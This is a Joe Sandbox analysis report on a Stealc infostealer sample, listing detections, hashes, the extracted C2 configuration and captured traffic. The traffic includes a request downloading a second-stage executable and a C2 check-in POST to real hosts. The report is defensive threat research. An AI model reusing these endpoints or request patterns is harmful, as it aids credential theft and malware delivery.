Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jicQJ2cdlM.exe

Overview

General Information

Sample name:jicQJ2cdlM.exe
renamed because original name is a hash value
Original sample name:c26c0c92ef5ad707c6f9dd37b2c016ae.exe
Analysis ID:1542867
MD5:c26c0c92ef5ad707c6f9dd37b2c016ae
SHA1:7269e1394aeb4bb014babee479e7a520a7bfe6d0
SHA256:9cebd9110296bdd93cb0d23ed1a591d097a49f3827b364daf44615885dbdcff7
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jicQJ2cdlM.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\jicQJ2cdlM.exe" MD5: C26C0C92EF5AD707C6F9DD37B2C016AE)
    • A8A9.tmp.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe" MD5: 085DE763171FBBAFEAC2CDB972AACC2A)
      • WerFault.exe (PID: 7576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 1132 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000003.1833028905.0000000002D60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x1220:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.3.A8A9.tmp.exe.2d60000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            1.2.A8A9.tmp.exe.2d10e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
              1.2.A8A9.tmp.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                1.3.A8A9.tmp.exe.2d60000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  1.2.A8A9.tmp.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-26T18:58:28.019793+020020442431Malware Command and Control Activity Detected192.168.2.44973262.204.41.17780TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-26T18:58:18.093755+020028032742Potentially Bad Traffic192.168.2.449730104.21.56.70443TCP
                    2024-10-26T18:58:19.631888+020028032742Potentially Bad Traffic192.168.2.449731176.113.115.3780TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                    Found malware configuration
                    Source: 00000001.00000003.1833028905.0000000002D60000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeReversingLabs: Detection: 34%
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeReversingLabs: Detection: 34%
                    Multi AV Scanner detection for submitted file
                    Source: jicQJ2cdlM.exeReversingLabs: Detection: 31%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: jicQJ2cdlM.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,1_2_0040C820
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00407240
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00409AC0
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00418EA0
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_00409B60
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,1_2_02D1CA87
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D174A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_02D174A7
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D19DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_02D19DC7
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D29107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_02D29107
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D19D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_02D19D27

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeUnpacked PE file: 0.2.jicQJ2cdlM.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeUnpacked PE file: 1.2.A8A9.tmp.exe.400000.1.unpack
                    Source: jicQJ2cdlM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040E430
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_004138B0
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,1_2_00414570
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00414910
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0040ED20
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040BE70
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040DE10
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004016D0
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040DA80
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_00413EA0
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040F6B0
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_02D1E697
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D247D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_02D247D7
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_02D1EF87
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D24B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_02D24B77
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D23B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_02D23B17
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_02D1C0D7
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_02D1DCE7
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_02D1E077
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_02D1F917
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D24107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_02D24107
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D11937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_02D11937

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 62.204.41.177:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://62.204.41.177/edd20096ecef326d.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 16:58:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 26 Oct 2024 16:45:02 GMTETag: "62400-62563f4f86bc9"Accept-Ranges: bytesContent-Length: 402432Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 81 e6 bb d7 e0 88 e8 d7 e0 88 e8 d7 e0 88 e8 6a af 1e e8 d6 e0 88 e8 c9 b2 0c e8 ca e0 88 e8 c9 b2 1d e8 c3 e0 88 e8 c9 b2 0b e8 ba e0 88 e8 f0 26 f3 e8 d2 e0 88 e8 d7 e0 89 e8 ac e0 88 e8 c9 b2 02 e8 d6 e0 88 e8 c9 b2 1c e8 d6 e0 88 e8 c9 b2 19 e8 d6 e0 88 e8 52 69 63 68 d7 e0 88 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fe b8 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a4 03 00 00 d8 72 02 00 00 00 00 1e 17 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 76 02 00 04 00 00 15 54 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec db 03 00 3c 00 00 00 00 60 74 02 70 05 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4c a2 03 00 00 10 00 00 00 a4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ca 25 00 00 00 c0 03 00 00 26 00 00 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 14 70 02 00 f0 03 00 00 18 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 65 72 69 72 69 74 00 44 00 00 00 10 74 02 00 38 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 05 02 00 00 60 74 02 00 06 02 00 00 1e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIECHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 38 35 45 46 46 41 42 36 38 30 38 33 36 37 34 34 38 30 34 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 2d 2d 0d 0a Data Ascii: ------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="hwid"985EFFAB68083674480464------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="build"default9_cap------KJEHJKJEBGHJJKEBGIEC--
                    Source: Joe Sandbox ViewIP Address: 176.113.115.37 176.113.115.37
                    Source: Joe Sandbox ViewIP Address: 62.204.41.177 62.204.41.177
                    Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
                    Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.37:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 104.21.56.70:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00402A14 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00402A14
                    Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                    Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                    Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIECHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 38 35 45 46 46 41 42 36 38 30 38 33 36 37 34 34 38 30 34 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 2d 2d 0d 0a Data Ascii: ------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; 